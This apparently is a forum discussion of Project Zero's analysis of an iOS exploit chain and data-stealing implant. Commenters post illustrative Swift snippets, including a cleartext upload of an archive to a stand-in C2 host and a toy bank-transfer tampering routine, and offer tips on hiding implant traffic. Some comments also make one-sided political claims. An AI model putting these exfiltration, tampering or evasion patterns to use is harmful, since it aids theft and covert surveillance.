Outside of the great tech writeup, what is particularly interesting about this, to me, from a geopolitical perspective is the level of restraint.
The malicious actors in this case leveraged iOS zero-days for years and yet do not seem to have overextended themselves or risked exposure by widening their intended targets. What I mean is: they clearly could have achieved a massive infection rate by combining this with hacking a well-known popular site, or even by pulling in more visits from (say) social media, but instead they chose to limit their reach, running the exploits against a smaller set of targets for much longer while remaining undetected.
This, to me, hints at a state-actor with specific intent.
Crazy that the Implant was never detected directly on a phone. It's certainly visible to iOS itself, but apparently iOS isn't looking for unexpected processes running on the phone. The Implant is also sending network traffic that no one ever noticed or tracked down. And presumably it has some effect on battery life. But all of this just disappears into the noise of everything else going on on an iPhone.
I wonder if the Implant ever showed up in any of the crash reports collected by iOS and uploaded to Apple.
It's a user-facing option: https://support.apple.com/en-us/HT202100
I'm the tech lead for my company's in-house mobile app crash reporter. Every so often we get reports that make no sense. Sometimes they're corrupted in strange ways, which I just chalked up to bad device memory or storage, but who knows whether something like this wasn't the cause. Semi-related: I used to have jailbreak detection in the crash reporter SDKs, but I had to remove it. Just attempting to detect a jailbroken device was in some cases causing the SDK to crash, because the anti-jailbreak-detection code injected into the app was buggy.
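For context, a naive jailbreak check tends to look something like this minimal Swift sketch (the probed paths are common illustrative examples, not our actual SDK code); jailbreak-hiding tweaks hook exactly these kinds of calls, and a buggy hook crashes the host app:

```swift
import Foundation

// Minimal sketch of a naive jailbreak heuristic: probe for well-known
// jailbreak artifacts on disk. Paths are illustrative, not exhaustive.
func looksJailbroken() -> Bool {
    let suspiciousPaths = [
        "/Applications/Cydia.app",
        "/Library/MobileSubstrate/MobileSubstrate.dylib",
        "/bin/bash",
        "/usr/sbin/sshd",
    ]
    // Jailbreak-hiding tweaks hook file-existence checks like this one to
    // lie about these paths; a buggy hook can crash the app doing the check.
    return suspiciousPaths.contains { FileManager.default.fileExists(atPath: $0) }
}
```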
I wonder how many people you would need to infect, on average, until you were detected?
I would guess, with this exploit chain and the lack of auditing available for iOS internals, that the actual exploit could run a billion-plus times before detection. The biggest risk is someone noticing the wedged WebKit renderer process and trying to debug it. I bet that causes oddities when hooked up to a Mac with devtools open.
Of the whole thing, the HTTP network traffic is probably by far the biggest red flag - and perhaps 1 out of 10 million people might notice/investigate that. Simple things like never connecting over wifi (cell network is far harder to sniff), and redirecting traffic, encrypted, via a popular CDN would be a good way to hide it.
True, but wouldn't that lead western three letter agencies to an account with a credit card attached? Sure, criminals can get stolen cards, but I imagine those have a limited lifespan and chasing after payment problems is not what the hacker wants to be doing.
For a three-letter agency, legal issues might be the bigger hurdle. E.g. you might have to make sure the data passing through the CDN, and thus the CDN itself, isn't in some other jurisdiction when spying on your own citizens.
Isn't that a problem with the iOS walled garden? Not even security researchers can properly investigate users' devices and detect infections like this, the way they can with desktop operating systems.
I suppose it depends on how "special" they are—do they run standard iOS with normal Safari and actual apps?
NB I heard some infosec research companies actually get rooted phones from Apple with some big caveats.
It’s on us - the end user.
No, please don't tell me about Android. That's a fucked-up minefield altogether.
We need to remember that there is not, and never will be, 100% security. While not open — which is worth nothing to the average user anyway — we get pretty close with iOS, given all we know.
Is there a particular region of the world or community where this specific list makes most sense?
So the suspects are countries that fight against the autonomy of a region whose population is ethnically different. The most obvious suspect is China: they have gulag-style camps in Xinjiang where Uyghurs are interned, up to 1.1 million according to the UN[^2]. The dominant ethnic group in China is Han, and Uyghurs have been oppressed for decades.
Of course, other countries could do this, but the probability of Myanmar/Rohingya, Saudi Arabia/Yemen… seems much lower. On a side note, Voxer seems to be quite prominent in China, judging by the popularity of their Android app[^3].
However, with the spread of Salafism in that region, China started to suffer multiple terrorist attacks a year, the worst resulting in 35 deaths and hundreds injured.
As a result, to stop these terrorist attacks, China started these de-radicalization centres. Since then, there have been no attacks.
But China doesn't need exploits to spy on their iPhone-using citizens, right? Because Apple has been cooperating with the Chinese government.
Line is mostly used in Japan, and Signal is mostly used by nerds. So you can assume neither Japanese people nor nerds were their primary target. Given that this is true of the vast majority of the world's population, I'd not call this odd.
By contrast, Telegram has a quick selection of the last few pictures available immediately, and the general picker opens quicker if you request it -- maybe because it's using the stock iOS picker rather than the custom one Signal implements? (See the sketch after this comment.)
Since sending a picture to a contact was a super common action of mine, this was incredibly frustrating.
Signal also had notification issues if I was running the desktop client at the same time. It'd sometimes clear notifications from my phone before I'd actually read them in either location.
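For what it's worth, presenting the stock picker costs the app developer almost nothing; a minimal UIKit sketch (assuming a view controller that adopts the two delegate protocols UIImagePickerController requires):

```swift
import UIKit

// Minimal sketch: presenting the stock iOS photo picker.
final class ComposeViewController: UIViewController,
    UIImagePickerControllerDelegate, UINavigationControllerDelegate {

    func showStockPicker() {
        let picker = UIImagePickerController()
        picker.sourceType = .photoLibrary
        picker.delegate = self
        present(picker, animated: true)
    }

    // Receives the chosen image; a real app would attach it to the message.
    func imagePickerController(_ picker: UIImagePickerController,
                               didFinishPickingMediaWithInfo info: [UIImagePickerController.InfoKey: Any]) {
        let image = info[.originalImage] as? UIImage
        picker.dismiss(animated: true)
        _ = image
    }
}
```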
> The command-and-control server can also query for a list of all 3rd party apps and request uploads of their container directories.
Tremendously unlikely, PRISM was something very different from this.
I doubt they'd have written such shoddy and simple implant code though. At a minimum, they would have encrypted the data uploaded, since intelligence agencies love to steal data from other intelligence agencies, and sniffing wires I'm sure isn't unique to the USA.
edit: their implant is compiled unoptimized, has NSLog statements, and serializes data by writing everything as files to /tmp (a "rather odd design pattern", as Ian Beer put it), in addition to the HTTP issue just described. The implant/C2 code was likely written by a separate, less experienced team than the one that wrote the exploit chains (which might simply have been purchased?).
But agreed, it was probably purchased from some vuln dev and put together by some hack gov employee with some Microsoft certifications, or (far less likely) some indifferent blackhat with powerful weapons well out of his scope. That said, "black-market zero-day markets" are mostly non-existent hype, especially for multiple iOS vulns. There's a good reason the cost of those exploits is so high, given the low level of programming talent around in security.
Watering holes + "targeting sub-communities" typically mean spies hitting up some conference website or industry news thing. Who knows what country they are in and how sophisticated their local CS people are.
Awful at using good design patterns, unit tests, and neat code maybe... But not "write everything to /tmp, tar it up and upload it cleartext".
Even the most basic infosec folk know not to do that. What this does, as others have said, is reveal that the developers were not the ones who found the exploit - it was likely simply purchased.
Hehe, I have an idea. It's kind of crazy, so I assign it <10% probability, but if I were right it would kind of work:
We all "know" that well funded three letter agencies wouldn't let shoddy work like this pass.
As long as you aren't afraid that anyone will capture it in transit this is a good way to avoid suspicion.
Which could explain why it was so overdone: to make sure everybody sees how unlikely it is that a state actor did it.
Not only does the attacker have no one they care about hiding from, but also: the lack of encryption is a secondary attack.
Sure, when Vizio did this, it was probably incompetence...but here...trivially encrypting data is simple stuff, why not do it here when siphoning large streams of personal data?
Because third parties using this data to attack the tracked victims doesn’t hurt the attacker, it in fact helps them. From the state sponsored actor’s perspective, they are merely using these exploits to track minorities and dissidents, but hey, if a third party happens to find this info and use it and that keeps the victims spun up and less effective at organizing? Win-win.
The only way to be safe is probably to access your financial sites from a browser running inside a VM, maybe even on a dedicated laptop, and never sync the passwords anywhere outside the VM unencrypted.
These folks don't want money.
And statute protects you from fraud - just set up text and email alerts so large transactions alert you ASAP.
These folks may not want money, but the phone is vulnerable and the next set of folks may. Do you really think the crooks who commit identity theft and ransomware attacks aren't salivating at these attacks?
I think the nation states that will want to use them will clamp down hard on two bit hustlers who interrupt the fun.
Orders of magnitude more 0-days on whatever software is running on that laptop than on iOS.
This is bad advice.
What's more, every time you download a banking app on your phone, you have to place a little bit of trust in the competence of whoever the bank outsourced the programming job to. At least with a laptop, a poorly designed website is not (by itself) a threat to everything on your computer or other sites you visit.
Even when it comes to "more 0-days", I think you're probably missing the point. There's a lot more software written for computers that can be compromised than just the handful of programs that comprise iOS, so the raw count is not very meaningful. More practically, I'm willing to bet the odds my (Linux) laptop is compromised are far lower than my phone. I don't install apps I don't trust on my computer, but I have little choice but to on my phone.
Both would require a 0-day exploit to be a threat.
Just because the attacks are dumb.
If your computer is pwned, the malware just waits for you to complete 2FA; then, when you "log out", it doesn't actually log you out -- it does malicious stuff instead.
If the device you are using is compromised, you're in for a bad time.
You could send some simple transaction summary to the other device to acknowledge, which is getting better. Even so that doesn't completely eliminate the opportunity for tomfoolery.
When the user tries to transfer $1,000 from their investment account to their bank account, instead initiate a transfer of $100,000 to EvilGuy's bank account. Rewrite page elements so it appears that $1,000 is being transferred to the user's bank account, and wait for the user to receive their 2FA code and authenticate. This may be as easy as string replacement both ways.
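A toy sketch of that "string replacement both ways" idea (all names, form fields, and amounts here are made up for illustration):

```swift
import Foundation

// Toy illustration of "string replacement both ways" by malware sitting
// between the user's browser and the bank. Everything here is made up.

// Outbound: rewrite the transfer the user thinks they are submitting.
func tamperRequest(_ body: String) -> String {
    body.replacingOccurrences(of: "amount=1000&dest=my-checking",
                              with: "amount=100000&dest=evil-guy")
}

// Inbound: rewrite the confirmation page so the user still sees the
// $1,000 transfer they expected, then let them approve it via 2FA.
func tamperResponse(_ html: String) -> String {
    html.replacingOccurrences(of: "$100,000 to evil-guy",
                              with: "$1,000 to my-checking")
}
```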
Someone "using Linux" is likely to be running various things such as SSH/HTTP/file servers, native IRC clients, random build systems (running "npm install" instills a lot of trust on the NPM repository and any packages involved). All of these things increase the attack surface.
This is a fallacy. Rather than assessing the security of the Linux kernel or Linux distributions, you're making an assumption about Linux users and transferring the blame for their insecure practices onto Linux itself.
Think of it this way: if a random Windows user who didn't engage in such behavior were to switch to Linux, it's unlikely that would suddenly change. If the Linux kernel and system programs are more secure than Windows, that makes Linux a good choice if that person cares about security.
Note: I'm not making a statement about the security of Linux/Windows, just pointing out a flaw in the above argument.
I was responding to that assumption made by the parent:
> people who run laptops using linux probably have more security in the laptop than on their phone
When you run an application on iOS or Android, it doesn't have those capabilities. It can only get them through security exploits. In theory it should be similar to looking at a web page. If a web page is able to read arbitrary files, that's obviously a bug in the system. If an application on your laptop is able to read arbitrary files, that's standard functionality.
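A minimal Swift sketch of the difference (the path is just an illustrative example of data outside an app's own container):

```swift
import Foundation

// The same call has very different outcomes on the two platforms.
// Illustrative path: any user-readable file outside the app's container.
let outsidePath = "/Users/alice/Documents/tax-return.pdf"
if let data = FileManager.default.contents(atPath: outsidePath) {
    // Standard functionality for a desktop app: it can read any file
    // the logged-in user can read.
    print("read \(data.count) bytes")
} else {
    // Inside the iOS app sandbox, reads outside the app's own container
    // fail; an app needs an exploit to get past this.
    print("read denied (or file missing)")
}
```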
Apps that keep all this data locally, as is common on phones, are dangerous. Add the fact that most people have a phone as their two factor and you have a really bad situation when a phone is compromised. This, alone, makes phones an attractive target.
Meaning the session cookies are stored on your computer, meaning I can steal those and then do whatever nefarious things I want off-box. Locality is a myth; attackers don't care about it. They just want the data, and finding/weaponizing bugs is the hard part.
Speaking of native applications: many regular users still use native applications for email, chat, text processing, spreadsheets, etc.
So while you specifically might take care of having a very clean $HOME, most people don't.
If compromised, the attacker doesn't get a long log of comms, just a week's worth.
If they had sent some OAuth tokens for a honeypot Gmail account to the C&C server used in these attacks, they could then track the usage patterns of that token and find all the other attacked users. Perhaps that's how they identified who was being attacked?
We already know that ISPs routinely hijack your DNS queries to snarf your search queries, inject ads, redirect you to cached versions of big sites to “speed up your experience”, warn you of virus infection, etc etc.
It would be trivial for a state actor to use the same mechanism to redirect you to a site that, say, looks like Google, passes your search query to Google, returns Google's results, but also serves up the JS that pushes the implant.
Really pushes the issue that everyone — especially activists and targeted minority groups — needs to be educated about DNS and proper VPN usage (a misconfigured VPN would not help here), and it would be awesome if device makers made checking and verifying this stuff easier for ordinary users.
I'm not a sophisticated state actor, but if I were going to try to deliver a message to a group of people, I'd use ad networks to target the geography or population I was interested in. A bad actor could easily get a shitty ad network to deliver all sorts of payloads.
But yeah, absolutely, great point - shitty ads are doable AND geo-targetable!
"To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group." (https://googleprojectzero.blogspot.com/2019/08/a-very-deep-d...)
...and then if you think about what's been going on in Hong Kong recently -- search iPhone and Hong Kong in both languages and you'll find some interesting posts on Twitter that seem intended to keep folks from knowing that:
"All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly; treating their mobile devices as both integral to their modern lives, yet also as devices which when compromised, can upload their every action into a database to potentially be used against them." (https://googleprojectzero.blogspot.com/2019/08/a-very-deep-d...)
...it kind of reveals itself.
If nothing else, that would be a pretty good guess, given that amateurs don't have the skill to come up with "five separate, complete and unique iPhone exploit chains", and a professional team with the skill to create them is either going to report the vulnerabilities (white hat) or sell them on the black market, or at least try to infect a large number of people. The specificity of putting them on a single website with only "thousands" of views per week suggests that someone wanted to target visitors of that site specifically, not just for financial gain.
I'm surprised Apple doesn't talk more about how they're continuously upgrading the security of iPhones with new chip generations. I remember that the BlackHat presentation on iPhone security from a few years ago also found attacks on older iPhones which didn't work on the (then-)newer ones. Is Apple afraid it will give the impression that existing phones are not secure?
It also isn’t difficult to infer what a “code signing bypass” is, so I guess being arrested is a good excuse to buy a new phone? (Assuming we’re talking about a state based actor, in control of the territory you live in)
According to this (taken soon after iPhone XS/XR went on sale) this is not true: https://www.statista.com/statistics/755593/iphone-model-devi...
The downside of Android being an open platform is that Google is limited in forcing vendors to update their devices - and most do not. That said, Android has had regular monthly security releases for years, and the Pixel devices are excellent from a security perspective. Google also monitors its app store - as well as the full Android ecosystem (as far as Google Play Services is installed) for potentially harmful applications. This is why you regularly see articles along the lines of "Google removes malware from the Play Store that has had X installs!"
I'd say the biggest vulnerability for Android users given its impressive scale is a vulnerability in a vendor's supply chain. Given the complexity of devices, a vendor likely has multiple places where a malicious actor could insert malware into an Android device. I think this is why US intel has ultimately decided devices from China - Huawei in particular - are untrustworthy. If you can't validate every component of a device and trust the vendor will always audit its security, then it's hard to trust a device, even if it is safe right now.
"The implant binary does not persist on the device; if the phone is rebooted then the implant will not run until the device is re-exploited when the user visits a compromised site again. "
“The implant uploads the device's keychain, which contains a huge number of credentials and certificates used on and by the device.
The keychain also contains the long-lived tokens used by services such as Google's iOS Single-Sign-On to enable Google apps to access the user's account. These will be uploaded to the attackers and can then be used to maintain access to the user's Google account, even once the implant is no longer running.
There's something thus far which is conspicuous only by its absence: is any of this encrypted? The short answer is no: they really do POST everything via HTTP (not HTTPS) and there is no asymmetric (or even symmetric) encryption applied to the data which is uploaded. Everything is in the clear.”
“they really do POST everything via HTTP (not HTTPS) and there is no asymmetric (or even symmetric) encryption applied to the data which is uploaded. Everything is in the clear. If you're connected to an unencrypted WiFi network this information is being broadcast to everyone around you, to your network operator and any intermediate network hops to the command and control server.”
So not only are your photos, contacts, and messages stolen, but they're sent to the attacker over HTTP, so the data is probably logged on every router, modem, and Wi-Fi sniffer along the way.
Even if a C&C server is taken down, they would still be able to persist the data.
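To make the exposure concrete, here's a minimal sketch of what a cleartext upload like this amounts to (the URL and file path are hypothetical); every hop on the path can read the body verbatim:

```swift
import Foundation

// Sketch of a cleartext HTTP upload. The URL and file path are
// hypothetical; the point is that the entire body travels unencrypted,
// readable by the local network, the carrier, and every hop in between.
var request = URLRequest(url: URL(string: "http://c2.example.com/upload")!)
request.httpMethod = "POST"
request.httpBody = try? Data(contentsOf: URL(fileURLWithPath: "/tmp/exfil.tar"))

// Note: an ordinary iOS app would need an App Transport Security
// exception even to attempt plaintext HTTP; an unsandboxed implant
// process isn't necessarily constrained the same way.
URLSession.shared.dataTask(with: request) { _, _, _ in }.resume()
```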
Google does research into making it hard for attackers to compromise user devices; that is the purpose of the Project Zero team. There are no numbers because nobody has these numbers except the attacker. I'm guessing Google has some ballpark numbers based on search traffic or web analytics.
If you want to know whether you were affected, you need to ask yourself whether a powerful adversary wants access to your data, possibly because of civil unrest occurring in their territory, and whether you visit strange websites related to this. Only the adversary knows for sure, not Apple, not Google.
Surely that would be a pretty big giveaway for the user - "I was just browsing round the bombmaking-for-dummies webpage, and my browser just froze, and I had to kill it and reopen it".
So no, this is not a big giveaway.
Unless something on the Youtube site targeted my own and most of my friends' iOS devices, of course.
“Given the breadth of information stolen, the attackers may nevertheless be able to maintain persistent access to various accounts and services by using the stolen authentication tokens from the keychain, even after they lose access to the device.”
I'm not opposed to jailbreaking to check.
I would recommend checking your login history / OAuth permissions for anything you had in your keychain, and changing passwords for anything critical you used on your device if you suspect you were infected; a restart won't undo stolen information.
It’s likely that my devices were owned and on display for hackers in my local community. This article is a reminder of the trauma experienced as a result of the paranoia and mistrust I experienced, and a reminder that we are not to trust our consumer devices to really care about our privacy.
If Apple cared about user security, they'd build robust defenses into the devices that give the end user a degree of confidence regarding security. Instead, the iPhone on which I'm typing could at this time be 100% owned and leaking data in real time, and I'm afforded no visual indication of that possibility. The camera and microphone could be hot and transmitting, and Apple refuses to offer any way to confirm this in a robust, hardware-visual, unhackable way. That computer camera activity LEDs can be hacked (or could be in previous iterations) is indicative of the level of irresponsibility going on.
The blob that is the combination of a modem that interacts with cell towers, and the vastly complex computer tied to it, affords zero insight into what the phone is doing or whether it is betraying me.
And such privacy breaches are enough to ruin lives. The world is full of malicious folks who enjoy hurting others if they can get away with it.
- how did they know your name / for whom to look up these hacked messages?
- how did they know where to find these hacked messages?
- why would they reveal their ability to watch your every move by repeating your private messages?
- even if they had all of these capabilities and no shame about letting you know, why on earth would they care enough to look at your messages?
The scenario you’re convinced happened sounds completely bizarre, and gives me some strong Terry Davis vibes (no disrespect to him - that’s the person he became due to his illness).
So similar to Stagefright?
Wow Google. Like I applaud the Project Zero program and its goals but you never write this sort of stuff when discussing your android vulnerabilities. This is just petty.
Judging by the disclosure policy, this vulnerability must have been fixed already. I'm guessing it was fixed in iOS 12.4, or even before?
What's interesting is that (for most of these cases) I find that I can understand the process of the reverse engineering, but I am completely stupefied as to the process of the initial implementation. I understand finding relatively superficial vulnerabilities (e.g., an SQL injection attack), but I don't understand how these vulnerabilities are found when they are so many layers deep.
If anyone has an insight I would really appreciate it.
You don't have to wait until you find a JS exploit to start work on a payload that achieves further privilege escalation; you use existing development tools and privileges.
And what's really so different, in concept, between SQL injection and the lack of proper checks on the binary data header field at the beginning of the first post?
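Conceptually they're the same bug class: trusting attacker-controlled input. A hypothetical Swift sketch of the unchecked-length-field pattern:

```swift
import Foundation

// Hypothetical parser illustrating the same root cause as SQL injection:
// trusting attacker-controlled input. Here it trusts a length field in a
// binary header instead of a string in a query.
func parseMessage(_ data: Data) -> Data? {
    guard data.count >= 4 else { return nil }
    // Read a big-endian UInt32 length from the first four bytes.
    let claimed = data.prefix(4).reduce(UInt32(0)) { ($0 << 8) | UInt32($1) }
    // Bug: nothing checks that `claimed` fits in what was actually
    // received. Swift traps on the bad range below; the equivalent C
    // memcpy would read out of bounds instead.
    return data.subdata(in: 4 ..< 4 + Int(claimed))
    // Fix: guard data.count >= 4 + Int(claimed) before slicing.
}
```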
One of the later posts in the linked series goes through how the initial-stage stuff is, in one case, taken verbatim from the JS test case in the WebKit commit fixing the bug (which only reached users months later).
(Not at all saying it's not incredibly impressive or that I could do any of it, haha)
Poking a hole in the sandbox for "security" or "auditing" seems a bit risky.